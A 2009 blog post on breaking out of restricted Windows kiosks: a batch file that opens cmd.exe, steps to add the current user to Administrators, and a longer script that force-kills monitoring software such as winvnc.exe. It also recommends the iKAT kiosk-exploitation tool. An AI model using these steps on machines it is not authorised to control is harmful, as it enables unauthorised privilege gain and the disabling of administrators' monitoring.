There is a common source of hacking that many people overlook. It is well known that physical access is total access: if an attacker has physical access to a computer, it is not your computer anymore. Usually this involves booting a live CD to do things like grab the SAM file or replace it. I want to concentrate on a situation where you have physical access, but limited time and limited privileges. We are also assuming that you can't boot to anything else, and that you are not allowed to use a hardware keylogger. What can you do?

The objective is to get admin privileges; then we own the box. So first, let's see about a shell. In my experience, I just write a batch file. This is the source of hackery that is overlooked sometimes: batch files and VBS scripts don't need to be compiled, and the languages are simple. As long as you have Notepad, you are good.

Batch files are just a collection of commands to be executed by cmd.exe. The language also has if, for, goto and a few other basic programming features (there is no switch statement; you chain if and goto instead). VBS scripts are VBScript, a scripting dialect of Visual Basic that is run by the Windows Script Host (wscript.exe or cscript.exe). Most people use Visual Studio to make things with Visual Basic, but for VBScript you can get away with only Notepad. There won't be a GUI, but that can be a good thing. The only obvious sign that a batch or VBS script is running is the cmd.exe or wscript.exe process in Task Manager, which is one reason why disabling Task Manager for users is a bad idea: it hides the script from the person at the keyboard without doing anything to stop it. Anyway, here is the batch script that I used to get a shell whenever I needed one.
[code]
@echo off
rem Start an interactive cmd.exe; the batch file waits here until that shell exits.
cmd.exe
[/code]
Yes really, that's it. Even if the admin has disabled launching cmd.exe when you navigate to it, this will work. Keep in mind why: the batch file is itself interpreted by cmd.exe, so this gets you past restrictions on how cmd.exe is reached (a kiosk front end, a missing Start menu entry, a block on launching it from Explorer), not past a rule that prevents cmd.exe from executing at all; in that case the batch file never runs either. You can google for all kinds of interesting batch and VBS scripts, or you can be less lame and write your own. Once you get a shell, you can add yourself to the Administrators group. That only succeeds if the account you are already running as is an administrator (more common on kiosks and shared machines than it should be); otherwise you still need a local privilege escalation, and the shell is just the first step. You can also kill applications that you don't want running. In my situation, you could see the processes running but could not end any of them from Task Manager. So if you don't want VNC or other remote control software or access restriction stuff running, you can force kill it from the shell, with the same caveat: a limited user can only kill processes running under its own account, and anything running as a service or as another user needs admin rights.
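As an added example (my own, not code from the original post or from Paul Craig's tool), here is what the next few steps look like in a batch file once the shell is up: check whether the account actually has admin rights, try the group add, then locate and kill a named process. The process name winvnc.exe and the use of the current user name are assumptions. Every step is checked, because a limited user gets "Access is denied" both for the group change and for killing a service's process, and a script that silently continues past those errors tells you nothing.

```batch
@echo off
rem Added example, not from the original post. Assumptions: the process we want
rem gone is winvnc.exe, and the account to promote is the one running the script.
setlocal
set TARGET=winvnc.exe

rem "net session" only succeeds with administrator rights, which makes it a
rem cheap admin check (on XP-era systems; see the note below about UAC).
net session >nul 2>&1
if %errorlevel% neq 0 (
    echo [-] Running as %USERNAME% without admin rights.
    echo     net localgroup and taskkill /F on other accounts' processes will be denied.
) else (
    echo [+] Admin rights available; making %USERNAME% a direct member of Administrators.
    rem Harmless if the account is already a direct member: net just reports it.
    net localgroup Administrators %USERNAME% /add
)

rem Is the target process present at all? tasklist /FI filters on image name,
rem and find sets errorlevel 1 when the name is absent from the output.
tasklist /FI "IMAGENAME eq %TARGET%" | find /I "%TARGET%" >nul
if %errorlevel% neq 0 (
    echo [*] %TARGET% is not running.
    goto :done
)

rem Try to kill it. A limited user can only kill processes under its own
rem account; a service instance survives this and taskkill returns an error.
taskkill /F /IM %TARGET%
if %errorlevel% neq 0 (
    echo [-] Could not kill %TARGET%; it is probably running as a service or another user.
) else (
    echo [+] Killed %TARGET%.
)

:done
endlocal
```

Save it as a .bat file and run it from the shell you already have. One caveat on the admin check: on Vista and later with UAC enabled, net session also fails in a non-elevated prompt even for an administrator account, so a failure there proves only that this prompt is not elevated, not that the account lacks admin rights.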
Or, use this:
This is a bloody brilliant site written by Paul Craig. He presented it at DEF CON last year. It is designed to let you exploit internet kiosks. It basically automates the process of trying every possible way to get a shell, and it works great. Be aware that the site may be NSFW because of the giant picture of a girl's naked butt on the front. That is the one thing that I do not understand, because you would think that you wouldn't want to draw attention to yourself. Anyway, I am working on getting a version of his site up without the picture on it. Until then, he has released a zip file with all the code for the site in it, so you can use that. Here's the site:
http://ikat.ha.cked.net/
I also recommend watching the talk he gave at DEF CON. It's almost 100 MB, but it's worth it. It gives a great explanation of what exactly is going on behind the scenes.
Enjoy!
Friday, March 27, 2009